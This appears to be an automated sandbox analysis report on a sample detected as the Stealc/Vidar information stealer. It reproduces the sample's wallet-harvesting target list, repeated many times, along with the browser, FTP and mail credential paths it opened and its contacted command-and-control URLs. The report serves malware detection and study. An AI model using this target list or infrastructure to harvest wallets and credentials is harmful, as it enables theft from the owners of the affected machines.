Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: passphrase.json
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2082345429.000000000119E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*V
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1730489786.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2082345429.000000000119E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2080967365.0000000000351000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1544234 Sample: file.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 100 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 8 other signatures 2->46 7 file.exe 34 2->7         started        process3 dnsIp4 26 185.215.113.206, 49730, 49760, 80 WHOLESALECONNECTIONSNL Portugal 7->26 28 127.0.0.1 unknown unknown 7->28 18 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 7->18 dropped 20 C:\Users\user\AppData\...\softokn3[1].dll, PE32 7->20 dropped 22 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 7->22 dropped 24 10 other files (none is malicious) 7->24 dropped 48 Detected unpacking (changes PE section rights) 7->48 50 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->50 52 Tries to steal Mail credentials (via file / registry access) 7->52 54 10 other signatures 7->54 12 chrome.exe 7->12         started        file5 signatures6 process7 dnsIp8 30 192.168.2.4, 138, 443, 49723 unknown unknown 12->30 32 239.255.255.250 unknown Reserved 12->32 15 chrome.exe 12->15         started        process9 dnsIp10 34 www.google.com 172.217.16.196, 443, 49736, 49737 GOOGLEUS United States 15->34 36 plus.l.google.com 216.58.206.46, 443, 49750 GOOGLEUS United States 15->36 38 2 other IPs or domains 15->38
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
216.58.206.78
 play.google.com United States
15169 GOOGLEUS false
216.58.206.46
 plus.l.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
172.217.16.196
 www.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.2.4
127.0.0.1

Contacted Domains

Name IP Active
plus.l.google.com 216.58.206.46 true
play.google.com 216.58.206.78 true
www.google.com 172.217.16.196 true
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ true
    		unknown
    http://185.215.113.206/6c4adf523b719729.php true
      		unknown
      http://185.215.113.206/746f34465cf17784/softokn3.dll true
        		unknown
        http://185.215.113.206/746f34465cf17784/freebl3.dll true
          		unknown
          https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 false
            		unknown
            http://185.215.113.206/746f34465cf17784/mozglue.dll true
              		unknown
              http://185.215.113.206/746f34465cf17784/nss3.dll true
                		unknown